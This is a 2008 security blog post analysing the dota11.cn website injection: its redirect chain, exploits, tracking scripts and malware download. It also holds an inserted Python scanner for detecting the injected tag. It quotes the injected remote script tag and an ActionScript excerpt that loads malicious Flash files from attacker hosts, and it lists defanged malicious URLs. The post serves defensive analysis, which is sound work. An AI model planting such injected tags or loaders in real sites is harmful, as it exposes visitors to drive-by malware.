sudosecure.net

is anything truly secure…

Malicious Site Analysis for dota11.cn injection

Posted by jeremy on May 27th, 2008

SQL and XSS site injections have become a standard for spreading malicious code and binaries lately. This is my analysis of the dota11.cn injection that just recently occurred. My goal in doing this analysis is to provide a visual picture into how these types of injections work and the methodologies behind them. First off here is a Site Map for the current mappings of the dota11.cn injection:

As you can see from the Site Map, these types of injections serve as the gateways to a much larger schema of user tracking, malicious code, and exploit-serving web pages and/or scripts. Now let me attempt to walk you through the logic of this schema.

hxxp://www.dota11.cn/m.js

This is the entry page for this injection. The following is the actual code injected into a vulnerable web site:

<script src=hxxp://www.dota11.cn/m.js>

A simple script src= will automatically include the malicious code from the above URL, which is why it is injected into the vulnerable web site in the first place. The m.js file contains a simple JavaScript that is used to non-intrusively redirect you to a statistics gathering server. This allows the malicious designer of this schema to track users, system configurations, and traffic flows as you are involuntarily redirected through this maze of hostile content. The statistics gathering server is located here: web.51.la/go.asp. The other portion of the m.js file contains simple logic to render one of two iframe redirections based on your browser's language settings. If you have the Chinese language pack configured you will be directed to: windows.loveyoushipin.com/ing/le.htm, and if you don't have it configured you will be directed to: www.dota11.cn/dj.htm. The last and final portion of the m.js script will direct you via an iframe to: www.woai117.cn/123.htm. You can view the original m.js source code here in PDF format: M.js Source Code.
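As an added example (not code from the original post), here is a small scanner a site owner could run over their own pages to spot the injected tag described above: it flags remote script/iframe sources whose host appears in this write-up, and the unquoted `<script src=http://...>` form that these mass injections leave behind. The host list and the sample page are taken from, or constructed to match, the post; the site name `shop.example` is a placeholder.

```python
import re
from urllib.parse import urlparse

# Hosts this write-up identifies in the dota11.cn chain, used purely as a
# match list (the post defangs them as hxxp://; refang() undoes that).
KNOWN_HOSTS = {"www.dota11.cn", "www.woai117.cn", "windows.loveyoushipin.com",
               "web.51.la", "vip2.51.la", "js.users.51.la"}

# Mass SQL/XSS injections of this kind typically append an unquoted, unclosed
# <script src=http://...> tag; these patterns accept quoted and unquoted src.
SCRIPT_RE = re.compile(r"<script[^>]*\bsrc\s*=\s*['\"]?([^'\"\s>]+)", re.I)
IFRAME_RE = re.compile(r"<iframe[^>]*\bsrc\s*=\s*['\"]?([^'\"\s>]+)", re.I)

def refang(url):
    """Restore a report-style hxxp:// URL so urlparse sees a normal scheme."""
    return "http" + url[4:] if url.lower().startswith("hxxp") else url

def external_host(url, own_host):
    """Hostname of url if it points off-site, else None (relative/same-host)."""
    host = urlparse(refang(url)).hostname
    return host.lower() if host and host.lower() != own_host.lower() else None

def scan_html(html, own_host):
    """Return (tag, url, reason) for each script/iframe worth a closer look."""
    findings = []
    for tag, rx in (("script", SCRIPT_RE), ("iframe", IFRAME_RE)):
        for m in rx.finditer(html):
            url = m.group(1)
            host = external_host(url, own_host)
            if host is None:
                continue
            quoted = html[m.start(1) - 1] in "'\""
            if host in KNOWN_HOSTS:
                findings.append((tag, url, "known injection host"))
            elif tag == "script" and not quoted:
                findings.append((tag, url, "unquoted remote script src"))
    return findings

# Constructed sample: a page on the placeholder site "shop.example" carrying
# the injected tag quoted in the post plus a hidden iframe to the Flash host.
SAMPLE = (
    "<html><body><h1>Shop</h1>"
    "<script src=hxxp://www.dota11.cn/m.js>"
    "<script src='https://cdn.example/jquery.js'></script>"
    '<iframe src="hxxp://www.woai117.cn/123.htm" width=0 height=0></iframe>'
    "<script src=/js/app.js></script></body></html>"
)

if __name__ == "__main__":
    for finding in scan_html(SAMPLE, "shop.example"):
        print(*finding)
```

The quoted CDN script and the relative local script are left alone, so the output is limited to the two off-site references that match the chain.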

hxxp://windows.loveyoushipin.com/ing/le.htm

You will only receive this iframe redirection if your browser is configured to use the Chinese language pack. The le.htm file will attempt to serve a Real Player exploit (CVE-2007-5601) to you; more information on this vulnerability can be found here: Vulnerability Summary CVE-2007-5601. The other portion of this script will covertly redirect you to a short JavaScript at hxxp://js.users.51.la/1662569.js, which is the configuration gathering script that submits your information to the statistics gathering web server: vip2.51.la/go.asp. Strategically placing these statistics gathering scripts allows the malicious site designer to track their logic flows and exploit attempts to gauge how successful his or her design is. You can view the original le.htm and 1662569.js source code here in PDF format: 1662569_js Source Code and le_htm Source Code.

hxxp://www.dota11.cn/dj.htm

You will receive this iframe redirection if your browser is not configured to use the Chinese language pack. This file appears to be the most complex piece of this malicious schema, with several logically chosen exploits being served up, and it is obfuscated to prevent detection and deter analysis. The first attempt at serving up malicious content is targeted at an old vulnerability in the Microsoft Data Access Components (MDAC) function (MS06-014). If your configuration doesn't throw an error on the creation of the ADODB.Stream object you will be iframe-redirected to hxxp://www.dota11.cn/14.htm, where the malicious binary bak.exe will be downloaded to your computer from hxxp://www.woai117.cn/bak.exe via the MDAC vulnerability being exploited. If your configuration throws an error, a Real Player vulnerability will be probed for. Here is the vulnerability summary information: CVE-2007-5601; it is the same vulnerability that was seen in the le.htm file earlier. If this probe does not throw an error you will be redirected to hxxp://www.dota11.cn/rl.htm, where an attempt will be made to exploit this vulnerability. If the above Real Player vulnerability probe fails and throws an error you will be iframe-redirected to hxxp://www.dota11.cn/new.htm, where you will receive another attempt at exploiting a more recent Real Player vulnerability (CVE-2008-1309). You will also be redirected to hxxp://www.dota11.cn/04.htm, which looks like a left-behind iframe reference that the designer forgot to clean up. I say this because I received a 404 error when I tried grabbing this file. The last iframe redirection occurs no matter what the above logic dictated and will lead you to hxxp://www.dota11.cn/123.htm. Here is the source code for the files mentioned in this paragraph: dj_htm Source Code, 14_htm Source Code, rl_htm Source Code, and new_htm Source Code. The decoded version of dj.htm can be seen here: dj_htm_decoded Source Code. VirusTotal bak.exe Results.

hxxp://www.dota11.cn/123.htm and hxxp://www.woai117.cn/123.htm

These two files, although hosted on separate domains, contain the exact same content. Both of them serve up malicious Flash media files. If you're using Internet Explorer you will receive this video: hxxp://www.woai117.cn/4561.swf, and for all other browsers you will receive this video: hxxp://www.woai117.cn/4562.swf. Both of these use some embedded ActionScript logic to redirect you to a further malicious Flash media file chosen by your Flash Player version. For Internet Explorer users the redirect looks like this: hxxp://www.woai117.cn/ + fVersion + i.swf, and for all others it looks like this: hxxp://www.woai117.cn/ + fVersion + f.swf. The following excerpt is from the ActionScript being used:

movie '4561.swf' {
// flash 8, total frames: 1, frame rate: 12 fps, 550x400 px, compressed
frame 1 {
var fVersion = /:$version;
loadMovie('hxxp://www.woai117.cn/' + fVersion + 'i.swf', _root);
stop();
}
}

This looks like the same vulnerabilities SANS.org is referencing in Adobe Flash Player Vuln and Malicious swf files.

If you have any questions or comments regarding this posting, as always, feel free to contact me. I hope you enjoyed the change from the normal Storm Worm coverage. Thanks for visiting.

2 Responses to “Malicious Site Analysis for dota11.cn injection”

  1. Richard Says:

    This morning I reported dota11.cn to Google.com and they then reported the site to

    Google uses the StopBADware database to decide when to show a warning page to users. And so Google users should now get a warning.

    The bigger question is how is this happening?

    In this case the targeted web servers seem to belong to small/medium businesses with low technical knowledge:

    -Richard
    comet at transbay dot net

  2. Mike Says:

    Now I’m no techy, but this mentioned .cn domain site link has replaced my profile information on an international penpal website. Seems strange, my email account has also been hacked by somebody who is now sending out emails with .cn links, not to mention the daily pile of spam sent with .cn links. Hotmail has been contacted - hopefully they can sort it out!
